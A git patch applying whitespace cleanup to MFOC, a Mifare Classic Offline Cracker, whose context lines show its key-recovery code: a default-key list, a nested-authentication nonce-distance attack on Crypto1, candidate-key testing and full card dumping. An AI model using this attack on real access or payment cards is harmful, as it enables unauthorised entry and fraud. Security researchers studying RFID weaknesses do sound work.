From bc109b92524e38d954507b37c1dc3cd032dcfb3d Mon Sep 17 00:00:00 2001 From: Romuald Conty Date: Sun, 3 Jun 2012 21:07:51 +0000 Subject: [PATCH] some code clean up: find . -name '*.[ch]' | xargs perl -pi -e 's/\t+$//; s/ +$//' --- src/crapto1.h | 2 +- src/mfoc.c | 204 ++++++++++++++++++++++++------------------------ src/mfoc.h | 10 +-- src/mifare.c | 79 ++++++++++--------- src/mifare.h | 12 +-- src/nfc-utils.c | 8 +- src/nfc-utils.h | 8 +- 7 files changed, 163 insertions(+), 160 deletions(-) diff --git a/src/crapto1.h b/src/crapto1.h index fd97b15..5763861 100644 --- a/src/crapto1.h +++ b/src/crapto1.h @@ -48,7 +48,7 @@ int nonce_distance(uint32_t from, uint32_t to); break;\ else if(__i)\ __M = prng_successor(__M, (__i == 7) ? 48 : 8);\ - else + else #define LF_POLY_ODD (0x29CE5C) #define LF_POLY_EVEN (0x870804) diff --git a/src/mfoc.c b/src/mfoc.c index 6db0bf1..cad1d75 100644 --- a/src/mfoc.c +++ b/src/mfoc.c @@ -1,29 +1,29 @@ -/* - +/* + Mifare Classic Offline Cracker - + Requirements: crapto1 library http://code.google.com/p/crapto1 libnfc http://www.libnfc.org - + This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version. - + This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. - + You should have received a copy of the GNU General Public License along with this program. If not, see . - + Contact: Porting to libnfc 1.3.3: Michal Boska Porting to libnfc 1.3.9: Romuald Conty Porting to libnfc 1.4.x: Romuald Conty - + URL http://eprint.iacr.org/2009/137.pdf URL http://www.sos.cs.ru.nl/applications/rfid/2008-esorics.pdf URL http://www.cosic.esat.kuleuven.be/rfidsec09/Papers/mifare_courtois_rfidsec09.pdf @@ -61,21 +61,21 @@ int main(int argc, char * const argv[]) { int ch, i, k, n, j, m; int key, block; int succeed = 1; - + // Exploit sector - int e_sector; + int e_sector; int probes = DEFAULT_PROBES_NR; int sets = DEFAULT_SETS_NR; - + // By default, dump 'A' keys int dumpKeysA = true; bool failure = false; bool skip = false; - + // Next default key specified as option (-k) uint8_t * defKeys = NULL, *p; size_t defKeys_len = 0; - + // Array with default Mifare Classic keys uint8_t defaultKeys[][6] = { {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}, // Default key (first key used by program if no user defined key) @@ -93,7 +93,7 @@ int main(int argc, char * const argv[]) { {0x8f, 0xd0, 0xa4, 0xf2, 0x56, 0xe9} }; - + mftag t; mfreader r; denonce d = {NULL, 0, DEFAULT_DIST_NR, DEFAULT_TOLERANCE, {0x00, 0x00, 0x00}}; @@ -101,23 +101,23 @@ int main(int argc, char * const argv[]) { // Pointers to possible keys pKeys *pk; countKeys *ck; - + // Pointer to already broken keys, except defaults bKeys *bk; - + static mifare_param mp; static mifare_classic_tag mtDump; - + mifare_cmd mc; FILE *pfDump = NULL; - + // Parse command line arguments while ((ch = getopt(argc, argv, "hD:s:BP:T:S:O:k:t:")) != -1) { switch (ch) { case 'P': // Number of probes if (!(probes = atoi(optarg)) || probes < 1) { - ERR ("The number of probes must be a positive number"); + ERR ("The number of probes must be a positive number"); exit (EXIT_FAILURE); } // fprintf(stdout, "Number of probes: %d\n", probes); @@ -127,7 +127,7 @@ int main(int argc, char * const argv[]) { int res; // Nonce tolerance range if (((res = atoi(optarg)) != 0) || (res < 0)) { - ERR ("The nonce distances range must be a zero or a positive number"); + ERR ("The nonce distances range must be a zero or a positive number"); exit (EXIT_FAILURE); } d.tolerance = (uint32_t)res; @@ -146,12 +146,12 @@ int main(int argc, char * const argv[]) { num_to_bytes(strtoll(optarg, NULL, 16), 6, defKeys+defKeys_len); fprintf(stdout, "The custom key 0x%012llx has been added to the default keys\n", bytes_to_num(defKeys+defKeys_len, 6)); defKeys_len = defKeys_len + 6; - - break; + + break; case 'O': // File output if (!(pfDump = fopen(optarg, "wb"))) { - fprintf(stderr, "Cannot open: %s, exiting\n", optarg); + fprintf(stderr, "Cannot open: %s, exiting\n", optarg); exit (EXIT_FAILURE); } // fprintf(stdout, "Output file: %s\n", optarg); @@ -164,12 +164,12 @@ int main(int argc, char * const argv[]) { break; } } - + if (!pfDump) { ERR ("parameter -O is mandatory"); exit (EXIT_FAILURE); } - + // Initialize reader/tag structures mf_init(&r); @@ -207,7 +207,7 @@ int main(int argc, char * const argv[]) { nfc_perror (r.pdi, "nfc_initiator_select_passive_target"); goto error; } - + // Test if a compatible MIFARE tag is used if ((t.nt.nti.nai.btSak & 0x08) == 0) { ERR ("only Mifare Classic is supported"); @@ -224,37 +224,37 @@ int main(int argc, char * const argv[]) { t.num_blocks = (t.b4K) ? 0xff : 0x3f; t.num_sectors = t.b4K ? NR_TRAILERS_4k : NR_TRAILERS_1k; - + t.sectors = (void *) calloc(t.num_sectors, sizeof(sector)); if (t.sectors == NULL) { - ERR ("Cannot allocate memory for t.sectors"); + ERR ("Cannot allocate memory for t.sectors"); goto error; } if ((pk = (void *) malloc(sizeof(pKeys))) == NULL) { - ERR ("Cannot allocate memory for pk"); + ERR ("Cannot allocate memory for pk"); goto error; } if ((bk = (void *) malloc(sizeof(bKeys))) == NULL) { - ERR ("Cannot allocate memory for bk"); + ERR ("Cannot allocate memory for bk"); goto error; - } else { + } else { bk->brokenKeys = NULL; - bk->size = 0; + bk->size = 0; } - + d.distances = (void *) calloc(d.num_distances, sizeof(uint32_t)); if (d.distances == NULL) { - ERR ("Cannot allocate memory for t.distances"); + ERR ("Cannot allocate memory for t.distances"); goto error; - } - + } + // Initialize t.sectors, keys are not known yet for (uint8_t s = 0; s < (t.num_sectors); ++s) { t.sectors[s].foundKeyA = t.sectors[s].foundKeyB = false; } - + print_nfc_iso14443a_info (t.nt.nti.nai, true); - + // Try to authenticate to all sectors with default keys // Set the authentication information (uid) memcpy(mp.mpa.abtAuthUid, t.nt.nti.nai.abtUid + t.nt.nti.nai.szUidLen - 4, sizeof(mp.mpa.abtAuthUid)); @@ -279,7 +279,7 @@ int main(int argc, char * const argv[]) { if (!t.sectors[i].foundKeyA) { mc = MC_AUTH_A; if (!nfc_initiator_mifare_cmd(r.pdi,mc,block,&mp)) { - // fprintf(stdout, "!!Error: AUTH [Key A:%012llx] sector %02x t_block %02x\n", + // fprintf(stdout, "!!Error: AUTH [Key A:%012llx] sector %02x t_block %02x\n", // bytes_to_num(mp.mpa.abtKey, 6), i, block); mf_anticollision(t, r); } else { @@ -291,7 +291,7 @@ int main(int argc, char * const argv[]) { if (!t.sectors[i].foundKeyB) { mc = MC_AUTH_B; if (!nfc_initiator_mifare_cmd(r.pdi,mc,block,&mp)) { - // fprintf(stdout, "!!Error: AUTH [Key B:%012llx] sector %02x t_block %02x\n", + // fprintf(stdout, "!!Error: AUTH [Key B:%012llx] sector %02x t_block %02x\n", // bytes_to_num(mp.mpa.abtKey, 6), i, block); mf_anticollision(t, r); // No success, try next block @@ -311,7 +311,7 @@ int main(int argc, char * const argv[]) { fprintf(stdout, "."); } fflush(stdout); - // fprintf(stdout, "\nSuccess: AUTH [Key %c:%012llx] sector %02x t_block %02x\n", + // fprintf(stdout, "\nSuccess: AUTH [Key %c:%012llx] sector %02x t_block %02x\n", // (mc == MC_AUTH_A ? 'A' :'B'), bytes_to_num(mp.mpa.abtKey, 6), i, block); // Save position of a trailer block to sector struct t.sectors[i++].trailer = block; @@ -327,25 +327,25 @@ int main(int argc, char * const argv[]) { fprintf(stdout, "\n"); } fflush(stdout); - + // Return the first (exploit) sector encrypted with the default key or -1 (we have all keys) e_sector = find_exploit_sector(t); //mf_enhanced_auth(e_sector, 0, t, r, &d, pk, 'd'); // AUTH + Get Distances mode - + // Recover key from encrypted sectors, j is a sector counter for (m = 0; m < 2; ++m) { if (e_sector == -1) break; // All keys are default, I am skipping recovery mode for (j = 0; j < (t.num_sectors); ++j) { memcpy(mp.mpa.abtAuthUid, t.nt.nti.nai.abtUid + t.nt.nti.nai.szUidLen - 4, sizeof(mp.mpa.abtAuthUid)); if ((dumpKeysA && !t.sectors[j].foundKeyA) || (!dumpKeysA && !t.sectors[j].foundKeyB)) { - + // First, try already broken keys skip = false; for (uint32_t o = 0; o < bk->size; o++) { num_to_bytes(bk->brokenKeys[o], 6, mp.mpa.abtKey); mc = dumpKeysA ? 0x60 : 0x61; if (!nfc_initiator_mifare_cmd(r.pdi,mc,t.sectors[j].trailer,&mp)) { - // fprintf(stdout, "!!Error: AUTH [Key A:%012llx] sector %02x t_block %02x, key %d\n", + // fprintf(stdout, "!!Error: AUTH [Key A:%012llx] sector %02x t_block %02x, key %d\n", // bytes_to_num(mp.mpa.abtKey, 6), j, t.sectors[j].trailer, o); mf_anticollision(t, r); } else { @@ -358,7 +358,7 @@ int main(int argc, char * const argv[]) { t.sectors[j].foundKeyB = true; } printf("Sector: %d, type %c\n", j, (dumpKeysA ? 'A' : 'B')); - fprintf(stdout, "Found Key: %c [%012llx]\n", (dumpKeysA ? 'A' : 'B'), + fprintf(stdout, "Found Key: %c [%012llx]\n", (dumpKeysA ? 'A' : 'B'), bytes_to_num(mp.mpa.abtKey, 6)); mf_configure(r.pdi); mf_anticollision(t, r); @@ -367,16 +367,16 @@ int main(int argc, char * const argv[]) { } } if (skip) continue; // We have already revealed key, go to the next iteration - + // Max probes for auth for each sector for (k = 0; k < probes; ++k) { // Try to authenticate to exploit sector and determine distances (filling denonce.distances) mf_enhanced_auth(e_sector, 0, t, r, &d, pk, 'd', dumpKeysA); // AUTH + Get Distances mode printf("Sector: %d, type %c, probe %d, distance %d ", j, (dumpKeysA ? 'A' : 'B'), k, d.median); - // Configure device to the previous state + // Configure device to the previous state mf_configure(r.pdi); mf_anticollision(t, r); - + pk->possibleKeys = NULL; pk->size = 0; // We have 'sets' * 32b keystream of potential keys @@ -397,10 +397,10 @@ int main(int argc, char * const argv[]) { if (ck[i].count > 0) { // fprintf(stdout,"%d %llx\n",ck[i].count, ck[i].key); // Set required authetication method - num_to_bytes(ck[i].key, 6, mp.mpa.abtKey); + num_to_bytes(ck[i].key, 6, mp.mpa.abtKey); mc = dumpKeysA ? 0x60 : 0x61; if (!nfc_initiator_mifare_cmd(r.pdi,mc,t.sectors[j].trailer,&mp)) { - // fprintf(stdout, "!!Error: AUTH [Key A:%llx] sector %02x t_block %02x\n", + // fprintf(stdout, "!!Error: AUTH [Key A:%llx] sector %02x t_block %02x\n", // bytes_to_num(mp.mpa.abtKey, 6), j, t.sectors[j].trailer); mf_anticollision(t, r); } else { @@ -411,12 +411,12 @@ int main(int argc, char * const argv[]) { if (dumpKeysA) { memcpy(t.sectors[j].KeyA, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); t.sectors[j].foundKeyA = true; - + } else { memcpy(t.sectors[j].KeyB, mp.mpa.abtKey, sizeof(mp.mpa.abtKey)); t.sectors[j].foundKeyB = true; } - fprintf(stdout, "Found Key: %c [%012llx]\n", (dumpKeysA ? 'A' : 'B'), + fprintf(stdout, "Found Key: %c [%012llx]\n", (dumpKeysA ? 'A' : 'B'), bytes_to_num(mp.mpa.abtKey, 6)); mf_configure(r.pdi); mf_anticollision(t, r); @@ -427,10 +427,10 @@ int main(int argc, char * const argv[]) { free(pk->possibleKeys); free(ck); // Success, try the next sector - if ((dumpKeysA && t.sectors[j].foundKeyA) || (!dumpKeysA && t.sectors[j].foundKeyB)) break; + if ((dumpKeysA && t.sectors[j].foundKeyA) || (!dumpKeysA && t.sectors[j].foundKeyB)) break; } // We haven't found any key, exiting - if ((dumpKeysA && !t.sectors[j].foundKeyA) || (!dumpKeysA && !t.sectors[j].foundKeyB)) { + if ((dumpKeysA && !t.sectors[j].foundKeyA) || (!dumpKeysA && !t.sectors[j].foundKeyB)) { ERR ("No success, maybe you should increase the probes"); exit (EXIT_FAILURE); } @@ -438,8 +438,8 @@ int main(int argc, char * const argv[]) { } dumpKeysA = false; } - - + + for (i = 0; i < (t.num_sectors); ++i) { if ((dumpKeysA && !t.sectors[i].foundKeyA) || (!dumpKeysA && !t.sectors[i].foundKeyB)) { fprintf(stdout, "\nTry again, there are still some encrypted blocks\n"); @@ -455,7 +455,7 @@ int main(int argc, char * const argv[]) { for (block = t.num_blocks; block >= 0; block--) { trailer_block(block) ? i-- : i; failure = true; - + // Try A key, auth() + read() memcpy(mp.mpa.abtKey, t.sectors[i].KeyA, sizeof(t.sectors[i].KeyA)); if (!nfc_initiator_mifare_cmd(r.pdi, MC_AUTH_A, block, &mp)) { @@ -479,7 +479,7 @@ int main(int argc, char * const argv[]) { // ERR ("Error: Auth B"); mf_configure(r.pdi); mf_anticollision(t, r); - } else { // and Read + } else { // and Read if (nfc_initiator_mifare_cmd(r.pdi, MC_READ, block, &mp)) { fprintf(stdout, "Block %02d, type %c, key %012llx :", block, 'B', bytes_to_num(t.sectors[i].KeyB, 6)); print_hex(mp.mpd.abtData, 16); @@ -502,7 +502,7 @@ int main(int argc, char * const argv[]) { } else if (!failure) memcpy(mtDump.amb[block].mbd.abtData, mp.mpd.abtData,16); memcpy(mp.mpa.abtAuthUid, t.nt.nti.nai.abtUid + t.nt.nti.nai.szUidLen - 4, sizeof(mp.mpa.abtAuthUid)); } - + // Finally save all keys + data to file if (fwrite(&mtDump, 1, sizeof(mtDump), pfDump) != sizeof(mtDump)) { fprintf(stdout, "Error, cannot write dump\n"); @@ -511,10 +511,10 @@ int main(int argc, char * const argv[]) { } fclose(pfDump); } - + free(t.sectors); free(d.distances); - + // Reset the "advanced" configuration to normal nfc_device_set_property_bool(r.pdi, NP_HANDLE_CRC, true); nfc_device_set_property_bool(r.pdi, NP_HANDLE_PARITY, true); @@ -609,14 +609,14 @@ void mf_select_tag(nfc_device* pdi, nfc_target* pnt) { int trailer_block(uint32_t block) { // Test if we are in the small or big sectors - return (block < 128) ? ((block + 1) % 4 == 0) : ((block + 1) % 16 == 0); + return (block < 128) ? ((block + 1) % 4 == 0) : ((block + 1) % 16 == 0); } // Return position of sector if it is encrypted with the default key otherwise exit.. int find_exploit_sector(mftag t) { - int i; + int i; bool interesting = false; - + for (i = 0; i < t.num_sectors; i++) { if (!t.sectors[i].foundKeyA || !t.sectors[i].foundKeyB) { interesting = true; @@ -655,32 +655,32 @@ int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d struct Crypto1State* revstate_start; uint64_t lfsr; - + // Possible key counter, just continue with a previous "session" uint32_t kcount = pk->size; - + uint8_t Nr[4] = { 0x00,0x00,0x00,0x00 }; // Reader nonce uint8_t Auth[4] = { 0x00, t.sectors[e_sector].trailer, 0x00, 0x00 }; uint8_t AuthEnc[4] = { 0x00, t.sectors[e_sector].trailer, 0x00, 0x00 }; uint8_t AuthEncPar[8] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; - + uint8_t ArEnc[8] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; uint8_t ArEncPar[8] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; - + uint8_t Rx[MAX_FRAME_LEN]; // Tag response uint8_t RxPar[MAX_FRAME_LEN]; // Tag response size_t RxLen; - + uint32_t Nt, NtLast, NtProbe, NtEnc, Ks1; int i, m; - + // Prepare AUTH command Auth[0] = (t.sectors[e_sector].foundKeyA) ? 0x60 : 0x61; iso14443a_crc_append (Auth,2); // fprintf(stdout, "\nAuth command:\t"); // print_hex(Auth, 4); - + // We need full control over the CRC if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_CRC, false) < 0) { nfc_perror (r.pdi, "nfc_device_set_property_bool crc"); @@ -704,10 +704,10 @@ int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d exit (EXIT_FAILURE); } // print_hex(Rx, 4); - + // Save the tag nonce (Nt) Nt = bytes_to_num(Rx, 4); - + // Init the cipher with key {0..47} bits if (t.sectors[e_sector].foundKeyA) { pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyA, 6)); @@ -717,7 +717,7 @@ int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d // Load (plain) uid^nt into the cipher {48..79} bits crypto1_word(pcs, bytes_to_num(Rx, 4) ^ t.uid, 0); - + // Generate (encrypted) nr+parity by loading it into the cipher for (i = 0; i < 4; i++) { // Load in, and encrypt the reader nonce (Nr) @@ -734,7 +734,7 @@ int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d ArEnc[i] = crypto1_byte(pcs, 0x00, 0) ^ (Nt&0xff); ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nt); } - + // Finally we want to send arbitrary parity bits if (nfc_device_set_property_bool(r.pdi, NP_HANDLE_PARITY, false) < 0) { nfc_perror (r.pdi, "nfc_device_set_property_bool parity"); @@ -749,11 +749,11 @@ int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d ERR ("Reader-answer transfer error, exiting.."); exit (EXIT_FAILURE); } - + // Now print the answer from the tag // fprintf(stdout, "\t{At}:\t"); // print_hex_par(Rx,RxLen,RxPar); - + // Decrypt the tag answer and verify that suc3(Nt) is At Nt = prng_successor(Nt, 32); if (!((crypto1_word(pcs, 0x00, 0) ^ bytes_to_num(Rx, 4)) == (Nt&0xFFFFFFFF))) { @@ -761,7 +761,7 @@ int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d exit (EXIT_FAILURE); } // fprintf(stdout, "Authentication completed.\n\n"); - + // If we are in "Get Distances" mode if (mode == 'd') { for (m = 0; m < d->num_distances; m++) { @@ -779,18 +779,18 @@ int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d exit (EXIT_FAILURE); } - // Decrypt the encrypted auth + // Decrypt the encrypted auth if (t.sectors[e_sector].foundKeyA) { pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyA, 6)); } else { pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyB, 6)); } - NtLast = bytes_to_num(Rx, 4) ^ crypto1_word(pcs, bytes_to_num(Rx, 4) ^ t.uid, 1); - + NtLast = bytes_to_num(Rx, 4) ^ crypto1_word(pcs, bytes_to_num(Rx, 4) ^ t.uid, 1); + // Save the determined nonces distance d->distances[m] = nonce_distance(Nt, NtLast); // fprintf(stdout, "distance: %05d\n", d->distances[m]); - + // Again, prepare and send {At} for (i = 0; i < 4; i++) { ArEnc[i] = crypto1_byte(pcs, Nr[i], 0) ^ Nr[i]; @@ -813,19 +813,19 @@ int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d exit (EXIT_FAILURE); } } // Next auth probe - + // Find median from all distances d->median = median(*d); //fprintf(stdout, "Median: %05d\n", d->median); } // The end of Get Distances mode - + // If we are in "Get Recovery" mode if (mode == 'r') { // Again, prepare the Auth command with MC_AUTH_A, recover the block and CRC Auth[0] = dumpKeysA ? 0x60 : 0x61; - Auth[1] = a_sector; + Auth[1] = a_sector; iso14443a_crc_append (Auth,2); - + // Encryption of the Auth command, sending the Auth command for (i = 0; i < 4; i++) { AuthEnc[i] = crypto1_byte(pcs,0x00,0) ^ Auth[i]; @@ -847,23 +847,23 @@ int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d nfc_perror (r.pdi, "nfc_device_set_property_bool crc restore M"); exit (EXIT_FAILURE); } - + // Save the encrypted nonce NtEnc = bytes_to_num(Rx, 4); - + // Parity validity check for (i = 0; i < 3; ++i) { d->parity[i] = (oddparity(Rx[i]) != RxPar[i]); - } - + } + // Iterate over Nt-x, Nt+x // fprintf(stdout, "Iterate from %d to %d\n", d->median-TOLERANCE, d->median+TOLERANCE); NtProbe = prng_successor(Nt, d->median-d->tolerance); for (m = d->median-d->tolerance; m <= d->median+d->tolerance; m +=2) { - - // Try to recover the keystream1 + + // Try to recover the keystream1 Ks1 = NtEnc ^ NtProbe; - + // Skip this nonce after invalid 3b parity check revstate_start = NULL; if (valid_nonce(NtProbe, NtEnc, Ks1, d->parity)) { @@ -881,7 +881,7 @@ int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d // fprintf(stdout, "New chunk by %d, sizeof %lu\n", kcount, pk->size * sizeof(uint64_t)); pk->possibleKeys = (uint64_t *) realloc((void *)pk->possibleKeys, pk->size * sizeof(uint64_t)); if (pk->possibleKeys == NULL) { - ERR ("Memory allocation error for pk->possibleKeys"); + ERR ("Memory allocation error for pk->possibleKeys"); exit (EXIT_FAILURE); } } @@ -897,9 +897,9 @@ int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d if (kcount != 0) { pk->size = --kcount; if ((pk->possibleKeys = (uint64_t *) realloc((void *)pk->possibleKeys, pk->size * sizeof(uint64_t))) == NULL) { - ERR ("Memory allocation error for pk->possibleKeys"); + ERR ("Memory allocation error for pk->possibleKeys"); exit (EXIT_FAILURE); - } + } } } crypto1_destroy(pcs); @@ -910,7 +910,7 @@ int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d uint32_t median(denonce d) { int middle = (int) d.num_distances / 2; qsort(d.distances, d.num_distances, sizeof(uint32_t), compar_int); - + if (d.num_distances % 2 == 1) { // Odd number of elements return d.distances[middle]; @@ -933,17 +933,17 @@ countKeys * uniqsort(uint64_t * possibleKeys, uint32_t size) { unsigned int i, j = 0; int count = 0; countKeys *our_counts; - + qsort(possibleKeys, size, sizeof (uint64_t), compar_int); - + our_counts = calloc(size, sizeof(countKeys)); if (our_counts == NULL) { ERR ("Memory allocation error for our_counts"); exit (EXIT_FAILURE); } - + for (i = 0; i < size; i++) { - if (possibleKeys[i+1] == possibleKeys[i]) { + if (possibleKeys[i+1] == possibleKeys[i]) { count++; } else { our_counts[j].key = possibleKeys[i]; diff --git a/src/mfoc.h b/src/mfoc.h index cf1fe63..74d497e 100644 --- a/src/mfoc.h +++ b/src/mfoc.h @@ -30,15 +30,15 @@ typedef struct { bool foundKeyB; uint8_t trailer; // Value of a trailer block } sector; - + typedef struct { uint32_t *distances; uint32_t median; uint32_t num_distances; uint32_t tolerance; uint8_t parity[3]; // used for 3 bits of parity information -} denonce; // Revealed information about nonce - +} denonce; // Revealed information about nonce + typedef struct { nfc_target nt; sector * sectors; // Allocate later, we do not know the number of sectors yet @@ -46,9 +46,9 @@ typedef struct { uint8_t num_sectors; uint8_t num_blocks; uint32_t uid; - bool b4K; + bool b4K; } mftag; - + typedef struct { uint64_t *possibleKeys; uint32_t size; diff --git a/src/mifare.c b/src/mifare.c index b3c3b63..7a3aeac 100644 --- a/src/mifare.c +++ b/src/mifare.c @@ -1,13 +1,13 @@ /*- * Public platform independent Near Field Communication (NFC) library examples - * + * * Copyright (C) 2009, Roel Verdult * Copyright (C) 2010, Romuald Conty, Romain Tartière - * + * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * 1) Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. + * this list of conditions and the following disclaimer. * 2 )Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. @@ -23,11 +23,14 @@ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. - * + * * Note that this license only applies on the examples, NFC library itself is under LGPL * */ - +/** + * @file mifare.c + * @brief provide samples structs and functions to manipulate MIFARE Classic and Ultralight tags using libnfc + */ #include "mifare.h" #include @@ -42,13 +45,13 @@ * The specified MIFARE command will be executed on the tag. There are different commands possible, they all require the destination block number. * @note There are three different types of information (Authenticate, Data and Value). * - * First an authentication must take place using Key A or B. It requires a 48 bit Key (6 bytes) and the UID. + * First an authentication must take place using Key A or B. It requires a 48 bit Key (6 bytes) and the UID. * They are both used to initialize the internal cipher-state of the PN53X chip (http://libnfc.org/hardware/pn53x-chip). - * After a successful authentication it will be possible to execute other commands (e.g. Read/Write). + * After a successful authentication it will be possible to execute other commands (e.g. Read/Write). * The MIFARE Classic Specification (http://www.nxp.com/acrobat/other/identification/M001053_MF1ICS50_rev5_3.pdf) explains more about this process. */ bool -nfc_initiator_mifare_cmd (nfc_device *pnd, const mifare_cmd mc, const uint8_t ui8Block, mifare_param *pmp) +nfc_initiator_mifare_cmd(nfc_device *pnd, const mifare_cmd mc, const uint8_t ui8Block, mifare_param *pmp) { uint8_t abtRx[265]; size_t szParamLen; @@ -59,56 +62,56 @@ nfc_initiator_mifare_cmd (nfc_device *pnd, const mifare_cmd mc, const uint8_t ui abtCmd[1] = ui8Block; // The block address (1K=0x00..0x39, 4K=0x00..0xff) switch (mc) { - // Read and store command have no parameter - case MC_READ: - case MC_STORE: - szParamLen = 0; - break; + // Read and store command have no parameter + case MC_READ: + case MC_STORE: + szParamLen = 0; + break; - // Authenticate command - case MC_AUTH_A: - case MC_AUTH_B: - szParamLen = sizeof (struct mifare_param_auth); - break; + // Authenticate command + case MC_AUTH_A: + case MC_AUTH_B: + szParamLen = sizeof(struct mifare_param_auth); + break; - // Data command - case MC_WRITE: - szParamLen = sizeof (struct mifare_param_data); - break; + // Data command + case MC_WRITE: + szParamLen = sizeof(struct mifare_param_data); + break; - // Value command - case MC_DECREMENT: - case MC_INCREMENT: - case MC_TRANSFER: - szParamLen = sizeof (struct mifare_param_value); - break; + // Value command + case MC_DECREMENT: + case MC_INCREMENT: + case MC_TRANSFER: + szParamLen = sizeof(struct mifare_param_value); + break; - // Please fix your code, you never should reach this statement - default: - return false; - break; + // Please fix your code, you never should reach this statement + default: + return false; + break; } // When available, copy the parameter bytes if (szParamLen) - memcpy (abtCmd + 2, (uint8_t *) pmp, szParamLen); + memcpy(abtCmd + 2, (uint8_t *) pmp, szParamLen); // FIXME: Save and restore bEasyFraming // bEasyFraming = nfc_device_get_property_bool (pnd, NP_EASY_FRAMING, &bEasyFraming); - if (nfc_device_set_property_bool (pnd, NP_EASY_FRAMING, true) < 0) { - nfc_perror (pnd, "nfc_device_set_property_bool"); + if (nfc_device_set_property_bool(pnd, NP_EASY_FRAMING, true) < 0) { + nfc_perror(pnd, "nfc_device_set_property_bool"); return false; } // Fire the mifare command int res; - if ((res = nfc_initiator_transceive_bytes (pnd, abtCmd, 2 + szParamLen, abtRx, sizeof(abtRx), -1)) < 0) { + if ((res = nfc_initiator_transceive_bytes(pnd, abtCmd, 2 + szParamLen, abtRx, sizeof(abtRx), -1)) < 0) { if (res == NFC_ERFTRANS) { // "Invalid received frame", usual means we are // authenticated on a sector but the requested MIFARE cmd (read, write) // is not permitted by current acces bytes; // So there is nothing to do here. } else { - nfc_perror (pnd, "nfc_initiator_transceive_bytes"); + nfc_perror(pnd, "nfc_initiator_transceive_bytes"); } // XXX nfc_device_set_property_bool (pnd, NP_EASY_FRAMING, bEasyFraming); return false; @@ -123,7 +126,7 @@ nfc_initiator_mifare_cmd (nfc_device *pnd, const mifare_cmd mc, const uint8_t ui // When we have executed a read command, copy the received bytes into the param if (mc == MC_READ) { if (res == 16) { - memcpy (pmp->mpd.abtData, abtRx, 16); + memcpy(pmp->mpd.abtData, abtRx, 16); } else { return false; } diff --git a/src/mifare.h b/src/mifare.h index 099cfd5..57d5344 100644 --- a/src/mifare.h +++ b/src/mifare.h @@ -1,13 +1,13 @@ /*- * Public platform independent Near Field Communication (NFC) library examples - * + * * Copyright (C) 2009, Roel Verdult * Copyright (C) 2010, Romuald Conty, Romain Tartière - * + * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * 1) Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. + * this list of conditions and the following disclaimer. * 2 )Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. @@ -23,13 +23,13 @@ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. - * + * * Note that this license only applies on the examples, NFC library itself is under LGPL * */ /** - * @file mifaretag.h + * @file mifare.h * @brief provide samples structs and functions to manipulate MIFARE Classic and Ultralight tags using libnfc */ @@ -75,7 +75,7 @@ typedef union { // Reset struct alignment to default # pragma pack() -bool nfc_initiator_mifare_cmd (nfc_device *pnd, const mifare_cmd mc, const uint8_t ui8Block, mifare_param *pmp); +bool nfc_initiator_mifare_cmd(nfc_device *pnd, const mifare_cmd mc, const uint8_t ui8Block, mifare_param *pmp); // Compiler directive, set struct alignment to 1 uint8_t for compatibility # pragma pack(1) diff --git a/src/nfc-utils.c b/src/nfc-utils.c index 2c9ace7..d2bd54b 100644 --- a/src/nfc-utils.c +++ b/src/nfc-utils.c @@ -1,13 +1,13 @@ /*- * Public platform independent Near Field Communication (NFC) library examples - * + * * Copyright (C) 2009, Roel Verdult * Copyright (C) 2010, Romuald Conty, Romain Tartière - * + * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * 1) Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. + * this list of conditions and the following disclaimer. * 2 )Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. @@ -23,7 +23,7 @@ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH 